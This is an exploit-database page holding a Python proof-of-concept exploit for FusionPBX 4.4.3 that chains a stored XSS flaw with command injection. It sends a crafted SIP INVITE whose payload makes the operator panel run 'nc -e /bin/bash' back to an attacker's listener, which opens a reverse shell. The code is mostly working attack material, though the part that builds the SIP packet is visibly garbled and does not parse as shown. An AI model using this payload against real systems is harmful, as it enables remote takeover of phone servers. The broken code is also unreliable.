FusionPBX 4.4.3 - Remote Command Execution Exploit #RCE

12 Jun 2019 00:00:00 | Reported by Dustin Cobb | Type: zdt | Source: 0day.today | 315 Views

FusionPBX 4.4.3 RCE via XSS: the exploit achieves remote command execution by injecting an XSS payload into a SIP INVITE packet.

Related (reporter, title, published)
- 0day.today: FusionPBX Operator Panel (exec.php) Command Execution Exploit, 15 Nov 2019 (zdt)
- Circl: CVE-2019-11409, 13 Nov 2019 17:44 (circl)
- CNVD: FusionPBX Operator Panel Module Cross-Site Scripting Vulnerability, 13 Jun 2019 (cnvd)
- CNVD: FusionPBX Operator Panel module cross-site scripting vulnerability (CNVD-2019-40060), 13 Jun 2019 (cnvd)
- CVE: CVE-2019-11408, 17 Jun 2019 17:59 (cve)
- CVE: CVE-2019-11409, 17 Jun 2019 18:02 (cve)
- Cvelist: CVE-2019-11408, 17 Jun 2019 17:59 (cvelist)
- Cvelist: CVE-2019-11409, 17 Jun 2019 18:02 (cvelist)
- Exploit DB: FusionPBX 4.4.3 - Remote Command Execution, 12 Jun 2019 (exploitdb)
- Exploit DB: FusionPBX - Operator Panel exec.php Command Execution (Metasploit), 20 Nov 2019 (exploitdb)
# Exploit Title: FusionPBX <= 4.4.3 Command Injection RCE via XSS 
# Date: 06-11-2019
# Exploit Author: Dustin Cobb
# Vendor Homepage: https://www.fusionpbx.com
# Software Link: https://github.com/fusionpbx/fusionpbx
# Version: <= 4.4.3
# Tested on: Debian 8.11
# CVE : CVE-2019-11408 (XSS) AND CVE-2019-11409 (Command Injection RCE)

#!/usr/bin/python
import socket, sys
from random import randint
from hashlib import md5

# Exploitation steps:
#
# 1. First, encode an XSS payload that will be injected into the
#    “Caller ID Number” field, or “User” component of the SIP 
#    “From” URI.
# 2. Connect to external SIP profile port and send a SIP INVITE 
#    packet with XSS payload injected into the From Field.
# 3. XSS payload will fire operator panel screen (CVE-2019-11408), which 
#    is designed to be monitored constantly by a call center operator.
# 4. Once XSS code executes, a call is made to the exec.php script 
#    (CVE-2019-11409) with a reverse shell payload that connects back to 
#    a netcat listener on the attacker system.  


# edit these variables to set up attack
victim_addr="10.10.10.10"
victim_host="victim-pbx1.example.com"
victim_num="12125551212"

attacker_ip="10.10.10.20"
attacker_port=4444

def encode(val):
    ret=""

    for c in val:
        ret+="\\x%02x" % ord(c)

    return ret

callid=md5(str(randint(0,99999999))).hexdigest()

cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port)
payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd

xss=";tag=%s
To: 
Call-ID: %s
CSeq: 1 INVITE
Contact: 
Max-Forwards: 70
User-Agent: Exploit POC
Content-Type: application/sdp
Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE
Content-Length: 209

v=0
o=root 1204310316 1204310316 IN IP4 127.0.0.1
s=Media Gateway
c=IN IP4 127.0.0.1
t=0 0
m=audio 4446 RTP/AVP 0 101
a=rtpmap:0 PCMU/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16
a=ptime:2
a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid)

payload=payload.replace("\n","\r\n")

s=socket.socket()

s.connect((victim_addr,5080))

print payload
print

s.send(payload)
data=s.recv(8192)

print data

#  0day.today [2019-06-12]  #

12 Jun 2019 00:00 (current) | Vulners AI Score: 7.1 (High risk) | EPSS: 0.86498 | 315 views